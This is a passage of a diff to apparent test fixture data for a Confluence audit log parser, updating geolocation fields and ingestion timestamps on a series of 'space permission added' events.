"Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2070,7 +1938,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045160526Z", + "ingested": "2021-12-14T14:34:52.859158980Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":445000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2145,20 +2013,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2166,7 +2028,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045162214Z", + "ingested": "2021-12-14T14:34:52.859159340Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":447000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2247,20 +2109,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2268,7 +2124,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045163967Z", + "ingested": "2021-12-14T14:34:52.859159817Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":450000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2349,20 +2205,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2370,7 +2220,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045165677Z", + "ingested": "2021-12-14T14:34:52.859160211Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":454000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2445,20 +2295,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2466,7 +2310,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045167343Z", + "ingested": "2021-12-14T14:34:52.859160565Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":457000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2547,20 +2391,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2568,7 +2406,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045169052Z", + "ingested": "2021-12-14T14:34:52.859160954Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":459000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2649,20 +2487,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2670,7 +2502,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045170741Z", + "ingested": "2021-12-14T14:34:52.859161494Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":462000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2745,20 +2577,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2766,7 +2592,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045172425Z", + "ingested": "2021-12-14T14:34:52.859161854Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":464000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2847,20 +2673,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2868,7 +2688,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045174116Z", + "ingested": "2021-12-14T14:34:52.859162216Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":467000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2949,20 +2769,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2970,7 +2784,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045175839Z", + "ingested": "2021-12-14T14:34:52.859162581Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":470000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3051,20 +2865,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3072,7 +2880,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045177522Z", + "ingested": "2021-12-14T14:34:52.859162940Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":472000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3147,20 +2955,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3168,7 +2970,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045179208Z", + "ingested": "2021-12-14T14:34:52.859163319Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":475000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3249,20 +3051,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3270,7 +3066,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045180886Z", + "ingested": "2021-12-14T14:34:52.859163681Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":479000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3351,20 +3147,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3372,7 +3162,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045182671Z", + "ingested": "2021-12-14T14:34:52.859164162Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":481000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3447,20 +3237,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3468,7 +3252,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045184367Z", + "ingested": "2021-12-14T14:34:52.859164532Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":484000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3549,20 +3333,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3570,7 +3348,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045186049Z", + "ingested": "2021-12-14T14:34:52.859164969Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":486000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3651,20 +3429,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3672,7 +3444,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045187722Z", + "ingested": "2021-12-14T14:34:52.859165328Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":489000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3747,20 +3519,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3768,7 +3534,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045189474Z", + "ingested": "2021-12-14T14:34:52.859165686Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission 